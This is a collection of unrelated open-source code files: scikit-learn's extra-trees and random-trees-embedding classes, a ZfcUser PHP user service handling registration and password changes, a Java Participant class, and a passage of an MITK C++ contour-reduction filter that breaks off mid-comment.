>>> clf.predict([[0, 0, 0, 0]])
array([1])
"""
def __init__(self,
n_estimators=100, *,
criterion="gini",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
min_impurity_decrease=0.,
min_impurity_split=None,
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
class_weight=None,
ccp_alpha=0.0,
max_samples=None):
super().__init__(
base_estimator=ExtraTreeClassifier(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"min_impurity_decrease", "min_impurity_split",
"random_state", "ccp_alpha"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
class_weight=class_weight,
max_samples=max_samples)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_decrease = min_impurity_decrease
self.min_impurity_split = min_impurity_split
self.ccp_alpha = ccp_alpha
class ExtraTreesRegressor(ForestRegressor):
"""
An extra-trees regressor.
This class implements a meta estimator that fits a number of
randomized decision trees (a.k.a. extra-trees) on various sub-samples
of the dataset and uses averaging to improve the predictive accuracy
and control over-fitting.
Read more in the :ref:`User Guide <forest>`.
Parameters
----------
n_estimators : int, default=100
The number of trees in the forest.
.. versionchanged:: 0.22
The default value of ``n_estimators`` changed from 10 to 100
in 0.22.
criterion : {"squared_error", "mse", "absolute_error", "mae"}, \
default="squared_error"
The function to measure the quality of a split. Supported criteria
are "squared_error" for the mean squared error, which is equal to
variance reduction as feature selection criterion, and "absolute_error"
for the mean absolute error.
.. versionadded:: 0.18
Mean Absolute Error (MAE) criterion.
.. deprecated:: 1.0
Criterion "mse" was deprecated in v1.0 and will be removed in
version 1.2. Use `criterion="squared_error"` which is equivalent.
.. deprecated:: 1.0
Criterion "mae" was deprecated in v1.0 and will be removed in
version 1.2. Use `criterion="absolute_error"` which is equivalent.
max_depth : int, default=None
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int or float, default=2
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
.. versionchanged:: 0.18
Added float values for fractions.
min_samples_leaf : int or float, default=1
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` training samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
.. versionchanged:: 0.18
Added float values for fractions.
min_weight_fraction_leaf : float, default=0.0
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_features : {"auto", "sqrt", "log2"}, int or float, default="auto"
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`round(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
max_leaf_nodes : int, default=None
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, default=0.0
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of samples, ``N_t`` is the number of
samples at the current node, ``N_t_L`` is the number of samples in the
left child, and ``N_t_R`` is the number of samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
.. versionadded:: 0.19
min_impurity_split : float, default=None
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. deprecated:: 0.19
``min_impurity_split`` has been deprecated in favor of
``min_impurity_decrease`` in 0.19. The default value of
``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
will be removed in 1.0 (renaming of 0.25).
Use ``min_impurity_decrease`` instead.
bootstrap : bool, default=False
Whether bootstrap samples are used when building trees. If False, the
whole dataset is used to build each tree.
oob_score : bool, default=False
Whether to use out-of-bag samples to estimate the generalization score.
Only available if bootstrap=True.
n_jobs : int, default=None
The number of jobs to run in parallel. :meth:`fit`, :meth:`predict`,
:meth:`decision_path` and :meth:`apply` are all parallelized over the
trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
context. ``-1`` means using all processors. See :term:`Glossary
<n_jobs>` for more details.
random_state : int, RandomState instance or None, default=None
Controls 3 sources of randomness:
- the bootstrapping of the samples used when building trees
(if ``bootstrap=True``)
- the sampling of the features to consider when looking for the best
split at each node (if ``max_features < n_features``)
- the draw of the splits for each of the `max_features`
See :term:`Glossary <random_state>` for details.
verbose : int, default=0
Controls the verbosity when fitting and predicting.
warm_start : bool, default=False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
ccp_alpha : non-negative float, default=0.0
Complexity parameter used for Minimal Cost-Complexity Pruning. The
subtree with the largest cost complexity that is smaller than
``ccp_alpha`` will be chosen. By default, no pruning is performed. See
:ref:`minimal_cost_complexity_pruning` for details.
.. versionadded:: 0.22
max_samples : int or float, default=None
If bootstrap is True, the number of samples to draw from X
to train each base estimator.
- If None (default), then draw `X.shape[0]` samples.
- If int, then draw `max_samples` samples.
- If float, then draw `max_samples * X.shape[0]` samples. Thus,
`max_samples` should be in the interval `(0.0, 1.0]`.
.. versionadded:: 0.22
Attributes
----------
base_estimator_ : ExtraTreeRegressor
The child estimator template used to create the collection of fitted
sub-estimators.
estimators_ : list of DecisionTreeRegressor
The collection of fitted sub-estimators.
feature_importances_ : ndarray of shape (n_features,)
The impurity-based feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance.
Warning: impurity-based feature importances can be misleading for
high cardinality features (many unique values). See
:func:`sklearn.inspection.permutation_importance` as an alternative.
n_features_ : int
The number of features.
.. deprecated:: 1.0
Attribute `n_features_` was deprecated in version 1.0 and will be
removed in 1.2. Use `n_features_in_` instead.
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
n_outputs_ : int
The number of outputs.
oob_score_ : float
Score of the training dataset obtained using an out-of-bag estimate.
This attribute exists only when ``oob_score`` is True.
oob_prediction_ : ndarray of shape (n_samples,) or (n_samples, n_outputs)
Prediction computed with out-of-bag estimate on the training set.
This attribute exists only when ``oob_score`` is True.
See Also
--------
sklearn.tree.ExtraTreeRegressor : Base estimator for this ensemble.
RandomForestRegressor : Ensemble regressor using trees with optimal splits.
Notes
-----
The default values for the parameters controlling the size of the trees
(e.g. ``max_depth``, ``min_samples_leaf``, etc.) lead to fully grown and
unpruned trees which can potentially be very large on some data sets. To
reduce memory consumption, the complexity and size of the trees should be
controlled by setting those parameter values.
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
Examples
--------
>>> from sklearn.datasets import load_diabetes
>>> from sklearn.model_selection import train_test_split
>>> from sklearn.ensemble import ExtraTreesRegressor
>>> X, y = load_diabetes(return_X_y=True)
>>> X_train, X_test, y_train, y_test = train_test_split(
... X, y, random_state=0)
>>> reg = ExtraTreesRegressor(n_estimators=100, random_state=0).fit(
... X_train, y_train)
>>> reg.score(X_test, y_test)
0.2708...
"""
def __init__(self,
n_estimators=100, *,
criterion="squared_error",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
max_leaf_nodes=None,
min_impurity_decrease=0.,
min_impurity_split=None,
bootstrap=False,
oob_score=False,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False,
ccp_alpha=0.0,
max_samples=None):
super().__init__(
base_estimator=ExtraTreeRegressor(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"min_impurity_decrease", "min_impurity_split",
"random_state", "ccp_alpha"),
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
max_samples=max_samples)
self.criterion = criterion
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_decrease = min_impurity_decrease
self.min_impurity_split = min_impurity_split
self.ccp_alpha = ccp_alpha
class RandomTreesEmbedding(BaseForest):
"""
An ensemble of totally random trees.
An unsupervised transformation of a dataset to a high-dimensional
sparse representation. A datapoint is coded according to which leaf of
each tree it is sorted into. Using a one-hot encoding of the leaves,
this leads to a binary coding with as many ones as there are trees in
the forest.
The dimensionality of the resulting representation is
``n_out <= n_estimators * max_leaf_nodes``. If ``max_leaf_nodes == None``,
the number of leaf nodes is at most ``n_estimators * 2 ** max_depth``.
Read more in the :ref:`User Guide <random_trees_embedding>`.
Parameters
----------
n_estimators : int, default=100
Number of trees in the forest.
.. versionchanged:: 0.22
The default value of ``n_estimators`` changed from 10 to 100
in 0.22.
max_depth : int, default=5
The maximum depth of each tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
min_samples_split : int or float, default=2
The minimum number of samples required to split an internal node:
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` is the minimum
number of samples for each split.
.. versionchanged:: 0.18
Added float values for fractions.
min_samples_leaf : int or float, default=1
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` training samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` is the minimum
number of samples for each node.
.. versionchanged:: 0.18
Added float values for fractions.
min_weight_fraction_leaf : float, default=0.0
The minimum weighted fraction of the sum total of weights (of all
the input samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided.
max_leaf_nodes : int, default=None
Grow trees with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
min_impurity_decrease : float, default=0.0
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of samples, ``N_t`` is the number of
samples at the current node, ``N_t_L`` is the number of samples in the
left child, and ``N_t_R`` is the number of samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
.. versionadded:: 0.19
min_impurity_split : float, default=None
Threshold for early stopping in tree growth. A node will split
if its impurity is above the threshold, otherwise it is a leaf.
.. deprecated:: 0.19
``min_impurity_split`` has been deprecated in favor of
``min_impurity_decrease`` in 0.19. The default value of
``min_impurity_split`` has changed from 1e-7 to 0 in 0.23 and it
will be removed in 1.0 (renaming of 0.25).
Use ``min_impurity_decrease`` instead.
sparse_output : bool, default=True
Whether or not to return a sparse CSR matrix, as default behavior,
or to return a dense array compatible with dense pipeline operators.
n_jobs : int, default=None
The number of jobs to run in parallel. :meth:`fit`, :meth:`transform`,
:meth:`decision_path` and :meth:`apply` are all parallelized over the
trees. ``None`` means 1 unless in a :obj:`joblib.parallel_backend`
context. ``-1`` means using all processors. See :term:`Glossary
<n_jobs>` for more details.
random_state : int, RandomState instance or None, default=None
Controls the generation of the random `y` used to fit the trees
and the draw of the splits for each feature at the trees' nodes.
See :term:`Glossary <random_state>` for details.
verbose : int, default=0
Controls the verbosity when fitting and predicting.
warm_start : bool, default=False
When set to ``True``, reuse the solution of the previous call to fit
and add more estimators to the ensemble, otherwise, just fit a whole
new forest. See :term:`the Glossary <warm_start>`.
Attributes
----------
base_estimator_ : DecisionTreeClassifier instance
The child estimator template used to create the collection of fitted
sub-estimators.
estimators_ : list of DecisionTreeClassifier instances
The collection of fitted sub-estimators.
feature_importances_ : ndarray of shape (n_features,)
The feature importances (the higher, the more important the feature).
n_features_ : int
The number of features when ``fit`` is performed.
.. deprecated:: 1.0
Attribute `n_features_` was deprecated in version 1.0 and will be
removed in 1.2. Use `n_features_in_` instead.
n_features_in_ : int
Number of features seen during :term:`fit`.
.. versionadded:: 0.24
n_outputs_ : int
The number of outputs when ``fit`` is performed.
one_hot_encoder_ : OneHotEncoder instance
One-hot encoder used to create the sparse embedding.
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
.. [2] Moosmann, F. and Triggs, B. and Jurie, F. "Fast discriminative
visual codebooks using randomized clustering forests"
NIPS 2007
Examples
--------
>>> from sklearn.ensemble import RandomTreesEmbedding
>>> X = [[0,0], [1,0], [0,1], [-1,0], [0,-1]]
>>> random_trees = RandomTreesEmbedding(
... n_estimators=5, random_state=0, max_depth=1).fit(X)
>>> X_sparse_embedding = random_trees.transform(X)
>>> X_sparse_embedding.toarray()
array([[0., 1., 1., 0., 1., 0., 0., 1., 1., 0.],
[0., 1., 1., 0., 1., 0., 0., 1., 1., 0.],
[0., 1., 0., 1., 0., 1., 0., 1., 0., 1.],
[1., 0., 1., 0., 1., 0., 1., 0., 1., 0.],
[0., 1., 1., 0., 1., 0., 0., 1., 1., 0.]])
"""
criterion = "squared_error"
max_features = 1
def __init__(self,
n_estimators=100, *,
max_depth=5,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_leaf_nodes=None,
min_impurity_decrease=0.,
min_impurity_split=None,
sparse_output=True,
n_jobs=None,
random_state=None,
verbose=0,
warm_start=False):
super().__init__(
base_estimator=ExtraTreeRegressor(),
n_estimators=n_estimators,
estimator_params=("criterion", "max_depth", "min_samples_split",
"min_samples_leaf", "min_weight_fraction_leaf",
"max_features", "max_leaf_nodes",
"min_impurity_decrease", "min_impurity_split",
"random_state"),
bootstrap=False,
oob_score=False,
n_jobs=n_jobs,
random_state=random_state,
verbose=verbose,
warm_start=warm_start,
max_samples=None)
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_leaf_nodes = max_leaf_nodes
self.min_impurity_decrease = min_impurity_decrease
self.min_impurity_split = min_impurity_split
self.sparse_output = sparse_output
def _set_oob_score_and_attributes(self, X, y):
raise NotImplementedError("OOB score not supported by tree embedding")
def fit(self, X, y=None, sample_weight=None):
"""
Fit estimator.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
The input samples. Use ``dtype=np.float32`` for maximum
efficiency. Sparse matrices are also supported, use sparse
``csc_matrix`` for maximum efficiency.
y : Ignored
Not used, present for API consistency by convention.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
Returns
-------
self : object
"""
self.fit_transform(X, y, sample_weight=sample_weight)
return self
def fit_transform(self, X, y=None, sample_weight=None):
"""
Fit estimator and transform dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Input data used to build forests. Use ``dtype=np.float32`` for
maximum efficiency.
y : Ignored
Not used, present for API consistency by convention.
sample_weight : array-like of shape (n_samples,), default=None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
Returns
-------
X_transformed : sparse matrix of shape (n_samples, n_out)
Transformed dataset.
"""
X = self._validate_data(X, accept_sparse=['csc'])
if issparse(X):
# Pre-sort indices to avoid that each individual tree of the
# ensemble sorts the indices.
X.sort_indices()
rnd = check_random_state(self.random_state)
y = rnd.uniform(size=X.shape[0])
super().fit(X, y, sample_weight=sample_weight)
self.one_hot_encoder_ = OneHotEncoder(sparse=self.sparse_output)
return self.one_hot_encoder_.fit_transform(self.apply(X))
def transform(self, X):
"""
Transform dataset.
Parameters
----------
X : {array-like, sparse matrix} of shape (n_samples, n_features)
Input data to be transformed. Use ``dtype=np.float32`` for maximum
efficiency. Sparse matrices are also supported, use sparse
``csr_matrix`` for maximum efficiency.
Returns
-------
X_transformed : sparse matrix of shape (n_samples, n_out)
Transformed dataset.
"""
check_is_fitted(self)
return self.one_hot_encoder_.transform(self.apply(X))
| kevin-intel/scikit-learn | sklearn/ensemble/_forest.py | Python | bsd-3-clause | 102,940 |
<?php
namespace ZfcUser\Service;
use Interop\Container\ContainerInterface;
use Zend\Authentication\AuthenticationService;
use Zend\Form\Form;
use Zend\ServiceManager\ServiceManager;
use Zend\Crypt\Password\Bcrypt;
use Zend\Hydrator;
use ZfcUser\EventManager\EventProvider;
use ZfcUser\Mapper\UserInterface as UserMapperInterface;
use ZfcUser\Options\UserServiceOptionsInterface;
class User extends EventProvider
{
/**
* @var UserMapperInterface
*/
protected $userMapper;
/**
* @var AuthenticationService
*/
protected $authService;
/**
* @var Form
*/
protected $loginForm;
/**
* @var Form
*/
protected $registerForm;
/**
* @var Form
*/
protected $changePasswordForm;
/**
* @var ServiceManager
*/
protected $serviceManager;
/**
* @var UserServiceOptionsInterface
*/
protected $options;
/**
* @var Hydrator\ClassMethods
*/
protected $formHydrator;
/**
* createFromForm
*
* @param array $data
* @return \ZfcUser\Entity\UserInterface
* @throws Exception\InvalidArgumentException
*/
public function register(array $data)
{
$class = $this->getOptions()->getUserEntityClass();
$user = new $class;
$form = $this->getRegisterForm();
$form->setHydrator($this->getFormHydrator());
$form->bind($user);
$form->setData($data);
if (!$form->isValid()) {
return false;
}
$user = $form->getData();
/* @var $user \ZfcUser\Entity\UserInterface */
$bcrypt = new Bcrypt;
$bcrypt->setCost($this->getOptions()->getPasswordCost());
$user->setPassword($bcrypt->create($user->getPassword()));
if ($this->getOptions()->getEnableUsername()) {
$user->setUsername($data['username']);
}
if ($this->getOptions()->getEnableDisplayName()) {
$user->setDisplayName($data['display_name']);
}
// If user state is enabled, set the default state value
if ($this->getOptions()->getEnableUserState()) {
$user->setState($this->getOptions()->getDefaultUserState());
}
$this->getEventManager()->trigger(__FUNCTION__, $this, array('user' => $user, 'form' => $form));
$this->getUserMapper()->insert($user);
$this->getEventManager()->trigger(__FUNCTION__.'.post', $this, array('user' => $user, 'form' => $form));
return $user;
}
/**
* change the current users password
*
* @param array $data
* @return boolean
*/
public function changePassword(array $data)
{
$currentUser = $this->getAuthService()->getIdentity();
$oldPass = $data['credential'];
$newPass = $data['newCredential'];
$bcrypt = new Bcrypt;
$bcrypt->setCost($this->getOptions()->getPasswordCost());
if (!$bcrypt->verify($oldPass, $currentUser->getPassword())) {
return false;
}
$pass = $bcrypt->create($newPass);
$currentUser->setPassword($pass);
$this->getEventManager()->trigger(__FUNCTION__, $this, array('user' => $currentUser, 'data' => $data));
$this->getUserMapper()->update($currentUser);
$this->getEventManager()->trigger(__FUNCTION__.'.post', $this, array('user' => $currentUser, 'data' => $data));
return true;
}
public function changeEmail(array $data)
{
$currentUser = $this->getAuthService()->getIdentity();
$bcrypt = new Bcrypt;
$bcrypt->setCost($this->getOptions()->getPasswordCost());
if (!$bcrypt->verify($data['credential'], $currentUser->getPassword())) {
return false;
}
$currentUser->setEmail($data['newIdentity']);
$this->getEventManager()->trigger(__FUNCTION__, $this, array('user' => $currentUser, 'data' => $data));
$this->getUserMapper()->update($currentUser);
$this->getEventManager()->trigger(__FUNCTION__.'.post', $this, array('user' => $currentUser, 'data' => $data));
return true;
}
/**
* getUserMapper
*
* @return UserMapperInterface
*/
public function getUserMapper()
{
if (null === $this->userMapper) {
$this->userMapper = $this->getServiceManager()->get('zfcuser_user_mapper');
}
return $this->userMapper;
}
/**
* setUserMapper
*
* @param UserMapperInterface $userMapper
* @return User
*/
public function setUserMapper(UserMapperInterface $userMapper)
{
$this->userMapper = $userMapper;
return $this;
}
/**
* getAuthService
*
* @return AuthenticationService
*/
public function getAuthService()
{
if (null === $this->authService) {
$this->authService = $this->getServiceManager()->get('zfcuser_auth_service');
}
return $this->authService;
}
/**
* setAuthenticationService
*
* @param AuthenticationService $authService
* @return User
*/
public function setAuthService(AuthenticationService $authService)
{
$this->authService = $authService;
return $this;
}
/**
* @return Form
*/
public function getRegisterForm()
{
if (null === $this->registerForm) {
$this->registerForm = $this->getServiceManager()->get('zfcuser_register_form');
}
return $this->registerForm;
}
/**
* @param Form $registerForm
* @return User
*/
public function setRegisterForm(Form $registerForm)
{
$this->registerForm = $registerForm;
return $this;
}
/**
* @return Form
*/
public function getChangePasswordForm()
{
if (null === $this->changePasswordForm) {
$this->changePasswordForm = $this->getServiceManager()->get('zfcuser_change_password_form');
}
return $this->changePasswordForm;
}
/**
* @param Form $changePasswordForm
* @return User
*/
public function setChangePasswordForm(Form $changePasswordForm)
{
$this->changePasswordForm = $changePasswordForm;
return $this;
}
/**
* get service options
*
* @return UserServiceOptionsInterface
*/
public function getOptions()
{
if (!$this->options instanceof UserServiceOptionsInterface) {
$this->setOptions($this->getServiceManager()->get('zfcuser_module_options'));
}
return $this->options;
}
/**
* set service options
*
* @param UserServiceOptionsInterface $options
*/
public function setOptions(UserServiceOptionsInterface $options)
{
$this->options = $options;
}
/**
* Retrieve service manager instance
*
* @return ServiceManager
*/
public function getServiceManager()
{
return $this->serviceManager;
}
/**
* Set service manager instance
*
* @param ContainerInterface $serviceManager
* @return User
*/
public function setServiceManager(ContainerInterface $serviceManager)
{
$this->serviceManager = $serviceManager;
return $this;
}
/**
* Return the Form Hydrator
*
* @return \Zend\Hydrator\ClassMethods
*/
public function getFormHydrator()
{
if (!$this->formHydrator instanceof Hydrator\HydratorInterface) {
$this->setFormHydrator($this->getServiceManager()->get('zfcuser_register_form_hydrator'));
}
return $this->formHydrator;
}
/**
* Set the Form Hydrator to use
*
* @param Hydrator\HydratorInterface $formHydrator
* @return User
*/
public function setFormHydrator(Hydrator\HydratorInterface $formHydrator)
{
$this->formHydrator = $formHydrator;
return $this;
}
}
| ZF-Commons/ZfcUser | src/ZfcUser/Service/User.php | PHP | bsd-3-clause | 7,992 |
package synergynet3.web.apps.numbernet.shared;
import java.io.Serializable;
import com.google.gwt.user.client.rpc.IsSerializable;
/**
* Represents an individual person.
*
* @author dcs0ah1
*/
public class Participant implements Serializable, IsSerializable
{
/** The Constant serialVersionUID. */
private static final long serialVersionUID = 2647062936457560005L;
/** The name. */
private String name;
/**
* Instantiates a new participant.
*/
public Participant()
{
this.name = "<none>";
}
/**
* Instantiates a new participant.
*
* @param name
* the name
*/
public Participant(String name)
{
this.name = name;
}
/**
* Gets the name.
*
* @return the name
*/
public String getName()
{
return name;
}
/*
* (non-Javadoc)
* @see java.lang.Object#toString()
*/
@Override
public String toString()
{
return getName();
}
}
| synergynet/synergynet3.1 | synergynet3.1-parent/synergynet3-numbernet-core/src/main/java/synergynet3/web/apps/numbernet/shared/Participant.java | Java | bsd-3-clause | 896 |
/*===================================================================
The Medical Imaging Interaction Toolkit (MITK)
Copyright (c) German Cancer Research Center,
Division of Medical and Biological Informatics.
All rights reserved.
This software is distributed WITHOUT ANY WARRANTY; without
even the implied warranty of MERCHANTABILITY or FITNESS FOR
A PARTICULAR PURPOSE.
See LICENSE.txt or http://www.mitk.org for details.
===================================================================*/
#include "mitkReduceContourSetFilter.h"
mitk::ReduceContourSetFilter::ReduceContourSetFilter()
{
m_MaxSegmentLenght = 0;
m_StepSize = 10;
m_Tolerance = -1;
m_ReductionType = DOUGLAS_PEUCKER;
m_MaxSpacing = -1;
m_MinSpacing = -1;
this->m_UseProgressBar = false;
this->m_ProgressStepSize = 1;
m_NumberOfPointsAfterReduction = 0;
mitk::Surface::Pointer output = mitk::Surface::New();
this->SetNthOutput(0, output.GetPointer());
}
mitk::ReduceContourSetFilter::~ReduceContourSetFilter()
{
}
void mitk::ReduceContourSetFilter::SetInput( unsigned int idx, const mitk::Surface* surface )
{
this->SetNthInput( idx, const_cast<mitk::Surface*>( surface ) );
this->Modified();
}
void mitk::ReduceContourSetFilter::SetInput( const mitk::Surface* surface )
{
this->SetInput( 0, const_cast<mitk::Surface*>( surface ) );
}
void mitk::ReduceContourSetFilter::GenerateData()
{
unsigned int numberOfInputs = this->GetNumberOfIndexedInputs();
unsigned int numberOfOutputs (0);
vtkSmartPointer<vtkPolyData> newPolyData;
vtkSmartPointer<vtkCellArray> newPolygons;
vtkSmartPointer<vtkPoints> newPoints;
//For the purpose of evaluation
// unsigned int numberOfPointsBefore (0);
m_NumberOfPointsAfterReduction=0;
for(unsigned int i = 0; i < numberOfInputs; i++)
{
mitk::Surface* currentSurface = const_cast<mitk::Surface*>( this->GetInput(i) );
vtkSmartPointer<vtkPolyData> polyData = currentSurface->GetVtkPolyData();
newPolyData = vtkSmartPointer<vtkPolyData>::New();
newPolygons = vtkSmartPointer<vtkCellArray>::New();
newPoints = vtkSmartPointer<vtkPoints>::New();
vtkSmartPointer<vtkCellArray> existingPolys = polyData->GetPolys();
vtkSmartPointer<vtkPoints> existingPoints = polyData->GetPoints();
existingPolys->InitTraversal();
vtkIdType* cell (nullptr);
vtkIdType cellSize (0);
for( existingPolys->InitTraversal(); existingPolys->GetNextCell(cellSize, cell);)
{
bool incorporatePolygon = this->CheckForIntersection(cell,cellSize,existingPoints, /*numberOfIntersections, intersectionPoints, */i);
if ( !incorporatePolygon ) continue;
vtkSmartPointer<vtkPolygon> newPolygon = vtkSmartPointer<vtkPolygon>::New();
if(m_ReductionType == NTH_POINT)
{
this->ReduceNumberOfPointsByNthPoint(cellSize, cell, existingPoints, newPolygon, newPoints);
if (newPolygon->GetPointIds()->GetNumberOfIds() != 0)
{
newPolygons->InsertNextCell(newPolygon);
}
}
else if (m_ReductionType == DOUGLAS_PEUCKER)
{
this->ReduceNumberOfPointsByDouglasPeucker(cellSize, cell, existingPoints, newPolygon, newPoints);
if (newPolygon->GetPointIds()->GetNumberOfIds() > 3)
{
newPolygons->InsertNextCell(newPolygon);
}
}
//Again for evaluation
// numberOfPointsBefore += cellSize;
m_NumberOfPointsAfterReduction += newPolygon->GetPointIds()->GetNumberOfIds();
}
if (newPolygons->GetNumberOfCells() != 0)
{
newPolyData->SetPolys(newPolygons);
newPolyData->SetPoints(newPoints);
newPolyData->BuildLinks();
this->SetNumberOfIndexedOutputs(numberOfOutputs + 1);
mitk::Surface::Pointer surface = mitk::Surface::New();
this->SetNthOutput(numberOfOutputs, surface.GetPointer());
surface->SetVtkPolyData(newPolyData);
numberOfOutputs++;
}
}
// MITK_INFO<<"Points before: "<<numberOfPointsBefore<<" ##### Points after: "<<numberOfPointsAfter;
this->SetNumberOfIndexedOutputs(numberOfOutputs);
if (numberOfOutputs == 0)
{
mitk::Surface::Pointer tmp_output = mitk::Surface::New();
tmp_output->SetVtkPolyData(vtkPolyData::New());
this->SetNthOutput(0, tmp_output.GetPointer());
}
//Setting progressbar
if (this->m_UseProgressBar)
mitk::ProgressBar::GetInstance()->Progress(this->m_ProgressStepSize);
}
void mitk::ReduceContourSetFilter::ReduceNumberOfPointsByNthPoint (vtkIdType cellSize, vtkIdType* cell, vtkPoints* points, vtkPolygon* reducedPolygon, vtkPoints* reducedPoints)
{
unsigned int newNumberOfPoints (0);
unsigned int mod = cellSize%m_StepSize;
if(mod == 0)
{
newNumberOfPoints = cellSize/m_StepSize;
}
else
{
newNumberOfPoints = ( (cellSize-mod)/m_StepSize )+1;
}
if (newNumberOfPoints <= 3)
{
return;
}
reducedPolygon->GetPointIds()->SetNumberOfIds(newNumberOfPoints);
reducedPolygon->GetPoints()->SetNumberOfPoints(newNumberOfPoints);
for (vtkIdType i = 0; i < cellSize; i++)
{
if (i%m_StepSize == 0)
{
double point[3];
points->GetPoint(cell[i], point);
vtkIdType id = reducedPoints->InsertNextPoint(point);
reducedPolygon->GetPointIds()->SetId(i/m_StepSize, id);
}
}
vtkIdType id = cell[0];
double point[3];
points->GetPoint(id, point);
id = reducedPoints->InsertNextPoint(point);
reducedPolygon->GetPointIds()->SetId(newNumberOfPoints-1, id);
}
void mitk::ReduceContourSetFilter::ReduceNumberOfPointsByDouglasPeucker(vtkIdType cellSize, vtkIdType* cell, vtkPoints* points,
vtkPolygon* reducedPolygon, vtkPoints* reducedPoints)
{
//If the cell is too small to obtain a reduced polygon with the given stepsize return
if (cellSize <= static_cast<vtkIdType>(m_StepSize*3))return;
/*
What we do now is (see the Douglas Peucker Algorithm):
1. Divide the current contour in two line segments (start - middle; middle - end), put them into the stack
2. Fetch first line segment and create the following vectors:
- v1 = (start;end)
- v2 = (start;currentPoint) -> for each point of the current line segment!
3. Calculate the distance from the currentPoint to v1:
a. Determine the length of the orthogonal projection of v2 to v1 by:
